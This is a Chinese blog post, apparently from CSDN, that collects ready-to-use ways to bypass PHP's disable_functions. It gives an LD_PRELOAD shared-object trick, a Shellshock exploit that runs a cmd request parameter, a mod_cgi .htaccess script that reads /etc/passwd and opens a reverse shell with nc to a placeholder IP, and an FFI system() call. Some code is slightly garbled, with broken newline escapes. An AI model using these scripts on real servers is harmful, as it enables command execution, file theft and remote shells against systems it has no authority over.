bypass disable_function

主要参考https://www.anquanke.com/post/id/208451

0x01 LD_PRELOAD

LD_PRELOAD是什么 : 参考 警惕UNIX下的LD_PRELOAD环境变量 https://blog.csdn.net/haoel/article/details/1602108

绕过原理: https://blog.csdn.net/weixin_33738982/article/details/87979967

攻击思路:
1. 有上传权限,上传特定的PHP脚本,hack.so等
2. 上传自定义的动态链接库文件 hack.so ( 查看未封禁函数的加载函数 如readelf -s /usr/sbin/sendmail ,再改写重名函数)

php脚本参考( 根据mail()函数攻击 )


<?php
putenv("LD_PRELOAD=/var/www/hack.so");
mail("[email protected]","","","","");

hack.so源文件

#!c
#include <stdlib.h>
#include <stdio.h>
#include <string.h> 
 
void payload() {
        system("rm /tmp/check.txt");
}   
 
int  geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

0x02 ShellShock

利用bash破壳漏洞(CVE-2014-6271),该漏洞存在于bash 1.14 – 4.3版本中
exp.php ,上传利用即可 ?cmd=xxx

<?php 
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 
# Google Dork: none 
# Date: 10/31/2014 
# Exploit Author: Ryan King (Starfall) 
# Vendor Homepage: http://php.net 
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror 
# Version: 5.* (tested on 5.6.2) 
# Tested on: Debian 7 and CentOS 5 and 6 
# CVE: CVE-2014-6271 

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 
   $tmp = tempnam(".","data"); 
   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 
   // In Safe Mode, the user may only alter environment variableswhose names 
   // begin with the prefixes supplied by this directive. 
   // By default, users will only be able to set environment variablesthat 
   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, 
   // PHP will let the user modify ANY environment variable! 
   //mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallysend any mail 
   error_log('a',1);
   $output = @file_get_contents($tmp); 
   @unlink($tmp); 
   if($output != "") return $output; 
   else return "No output, or not vuln."; 
} 
echo shellshock($_REQUEST["cmd"]); 
?>

0x03 Apache Mod CGI

禁用 putenv 也可以利用

利用条件:

目录下有写权限
apache 使用 apache_mod_php
Web 目录给了 AllowOverride 权限
启用了mod_cgi

上传.htaccess

Options +ExecCGI
AddHandler cgi-script .test

在上传shell.test

#!/bin/bash
echo&&cat /etc/passwd

然后访问shell.test

exp脚本

<?php
$cmd = "nc -c '/bin/bash' xxx.xx.xx.xx 4444"; //command to be executed
$shellfile = "#!/bin/bashn"; //using a shellscript
$shellfile .= "echo -ne "Content-Type: text/html\n\n"n"; //header is needed, otherwise a 500 error is thrown when there is output
$shellfile .= "$cmd"; //executing $cmd
function checkEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
    echo "$text: " . ($condition ? $yes : $no) . "<br>n";
}
if (!isset($_GET['checked']))
{
    @file_put_contents('.htaccess', "nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
    header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
}
else
{
    $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
    $writable = is_writable('.'); //current dir writable?
    $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
        checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
        checkEnabled("Is writable",$writable,"Yes","No");
        checkEnabled("htaccess working",$htaccess,"Yes","No");
    if(!($modcgi && $writable && $htaccess))
    {
        echo "Error. All of the above must be true for the script to work!"; //abort if not
    }
    else
    {
        checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
        checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGInAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
        checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
        checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
        echo "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;'>"; //call the script
    }
}
?>

0x04 PHP-FPM

https://www.anquanke.com/post/id/208451#h2-4

0x05 UAF

Json Serializer UAF

利用json序列化中的堆溢出触发,借以绕过disable_function,影响范围:
7.1 – all versions to date
7.2 < 7.2.19 (released: 30 May 2019)
7.3 < 7.3.6 (released: 30 May 2019)

GC UAF

利用的是PHP garbage collector程序中的堆溢出触发,影响范围为7.0-1.3

Backtrace UAF

影响版本是7.0-7.4

exp : https://www.anquanke.com/post/id/208451#h2-8

0x06 FFI扩展

条件: php>7.4,开启了FFI扩展ffi.enable=true,我们可以通过FFI来调用C中的system进而达到执行命令的目的

exp:

<?php
$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("whoami >/tmp/1");
echo file_get_contents("/tmp/1");
@unlink("/tmp/1");
?>

访问即可获得返回结果

0x07 ImageMagick

0x08 COM组件

待补充

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 书香水墨 设计师:CSDN官方博客 返回首页